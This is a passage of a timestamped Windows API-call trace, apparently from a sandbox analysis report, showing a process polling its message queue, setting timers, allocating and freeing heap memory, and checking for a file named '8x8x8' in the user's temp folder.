(in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0234.806] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0234.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0234.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0234.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0234.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0234.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0234.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0234.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0234.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0234.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0234.807] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0234.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0234.807] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab668 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0234.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0234.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0234.808] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0234.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0234.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0234.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0234.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0234.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0234.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0234.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0234.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0234.808] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0234.809] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0234.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0234.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0234.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0234.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0234.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0234.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0234.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0234.809] timeGetTime () returned 0x117aa94 [0234.809] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.809] Sleep (dwMilliseconds=0xa) [0234.849] timeGetTime () returned 0x117aac3 [0234.849] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.849] Sleep (dwMilliseconds=0xa) [0234.893] timeGetTime () returned 0x117aaf1 [0234.893] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.893] Sleep (dwMilliseconds=0xa) [0234.940] timeGetTime () returned 0x117ab20 [0234.940] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.940] Sleep (dwMilliseconds=0xa) [0234.985] timeGetTime () returned 0x117ab40 [0234.985] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.985] Sleep (dwMilliseconds=0xa) [0235.005] timeGetTime () returned 0x117ab5f [0235.005] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.005] Sleep (dwMilliseconds=0xa) [0235.020] timeGetTime () returned 0x117ab6e [0235.020] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0235.020] TranslateMessage (lpMsg=0x8cf798) returned 0 [0235.020] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0235.020] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0235.020] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0235.020] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.020] Sleep (dwMilliseconds=0xa) [0235.033] timeGetTime () returned 0x117ab7e [0235.033] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.033] Sleep (dwMilliseconds=0xa) [0235.053] timeGetTime () returned 0x117ab8e [0235.053] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.053] Sleep (dwMilliseconds=0xa) [0235.065] timeGetTime () returned 0x117ab9d [0235.065] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.065] Sleep (dwMilliseconds=0xa) [0235.092] timeGetTime () returned 0x117abad [0235.092] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.093] Sleep (dwMilliseconds=0xa) [0235.128] timeGetTime () returned 0x117abdc [0235.128] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.128] Sleep (dwMilliseconds=0xa) [0235.143] timeGetTime () returned 0x117abeb [0235.143] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.143] Sleep (dwMilliseconds=0xa) [0235.160] timeGetTime () returned 0x117abfb [0235.160] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.160] Sleep (dwMilliseconds=0xa) [0235.176] timeGetTime () returned 0x117ac0b [0235.176] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.176] Sleep (dwMilliseconds=0xa) [0235.190] timeGetTime () returned 0x117ac1a [0235.190] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.190] Sleep (dwMilliseconds=0xa) [0235.207] timeGetTime () returned 0x117ac2a [0235.207] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.207] Sleep (dwMilliseconds=0xa) [0235.222] timeGetTime () returned 0x117ac3a [0235.222] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.222] Sleep (dwMilliseconds=0xa) [0235.237] timeGetTime () returned 0x117ac49 [0235.237] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.237] Sleep (dwMilliseconds=0xa) [0235.253] timeGetTime () returned 0x117ac59 [0235.253] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.253] Sleep (dwMilliseconds=0xa) [0235.268] timeGetTime () returned 0x117ac68 [0235.268] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.268] Sleep (dwMilliseconds=0xa) [0235.285] timeGetTime () returned 0x117ac78 [0235.285] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.285] Sleep (dwMilliseconds=0xa) [0235.301] timeGetTime () returned 0x117ac88 [0235.301] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.301] Sleep (dwMilliseconds=0xa) [0235.315] timeGetTime () returned 0x117ac97 [0235.315] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.315] Sleep (dwMilliseconds=0xa) [0235.330] timeGetTime () returned 0x117aca7 [0235.330] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.330] Sleep (dwMilliseconds=0xa) [0235.346] timeGetTime () returned 0x117acb7 [0235.346] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.346] Sleep (dwMilliseconds=0xa) [0235.361] timeGetTime () returned 0x117acc6 [0235.362] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.362] Sleep (dwMilliseconds=0xa) [0235.378] timeGetTime () returned 0x117acd6 [0235.378] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.378] Sleep (dwMilliseconds=0xa) [0235.393] timeGetTime () returned 0x117ace5 [0235.393] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.393] Sleep (dwMilliseconds=0xa) [0235.409] timeGetTime () returned 0x117acf5 [0235.409] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.409] Sleep (dwMilliseconds=0xa) [0235.426] timeGetTime () returned 0x117ad05 [0235.426] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.426] Sleep (dwMilliseconds=0xa) [0235.440] timeGetTime () returned 0x117ad14 [0235.440] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.440] Sleep (dwMilliseconds=0xa) [0235.456] timeGetTime () returned 0x117ad24 [0235.456] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.456] Sleep (dwMilliseconds=0xa) [0235.472] timeGetTime () returned 0x117ad34 [0235.472] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.472] Sleep (dwMilliseconds=0xa) [0235.487] timeGetTime () returned 0x117ad43 [0235.487] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.487] Sleep (dwMilliseconds=0xa) [0235.503] timeGetTime () returned 0x117ad53 [0235.503] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.503] Sleep (dwMilliseconds=0xa) [0235.518] timeGetTime () returned 0x117ad62 [0235.518] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.518] Sleep (dwMilliseconds=0xa) [0235.534] timeGetTime () returned 0x117ad72 [0235.534] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.534] Sleep (dwMilliseconds=0xa) [0235.554] timeGetTime () returned 0x117ad82 [0235.554] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.554] Sleep (dwMilliseconds=0xa) [0235.565] timeGetTime () returned 0x117ad91 [0235.565] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.565] Sleep (dwMilliseconds=0xa) [0235.583] timeGetTime () returned 0x117ada1 [0235.583] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.583] Sleep (dwMilliseconds=0xa) [0235.596] timeGetTime () returned 0x117adb1 [0235.596] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.596] Sleep (dwMilliseconds=0xa) [0235.613] timeGetTime () returned 0x117adc0 [0235.613] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.613] Sleep (dwMilliseconds=0xa) [0235.627] timeGetTime () returned 0x117add0 [0235.627] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.627] Sleep (dwMilliseconds=0xa) [0235.643] timeGetTime () returned 0x117addf [0235.643] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.643] Sleep (dwMilliseconds=0xa) [0235.659] timeGetTime () returned 0x117adef [0235.659] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.659] Sleep (dwMilliseconds=0xa) [0235.674] timeGetTime () returned 0x117adff [0235.674] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.674] Sleep (dwMilliseconds=0xa) [0235.690] timeGetTime () returned 0x117ae0e [0235.690] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.690] Sleep (dwMilliseconds=0xa) [0235.706] timeGetTime () returned 0x117ae1e [0235.706] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.706] Sleep (dwMilliseconds=0xa) [0235.721] timeGetTime () returned 0x117ae2e [0235.721] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.721] Sleep (dwMilliseconds=0xa) [0235.736] timeGetTime () returned 0x117ae3d [0235.736] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.736] Sleep (dwMilliseconds=0xa) [0235.752] timeGetTime () returned 0x117ae4d [0235.752] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.752] Sleep (dwMilliseconds=0xa) [0235.769] timeGetTime () returned 0x117ae5d [0235.769] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0235.770] TranslateMessage (lpMsg=0x8cf798) returned 0 [0235.770] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0235.770] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0235.770] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0235.770] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.770] Sleep (dwMilliseconds=0xa) [0235.786] timeGetTime () returned 0x117ae6c [0235.786] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.786] Sleep (dwMilliseconds=0xa) [0235.801] timeGetTime () returned 0x117ae7d [0235.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0235.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0235.801] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0235.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0235.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0235.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0235.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0235.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0235.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0235.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0235.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0235.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0235.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.802] RtlAllocateHeap 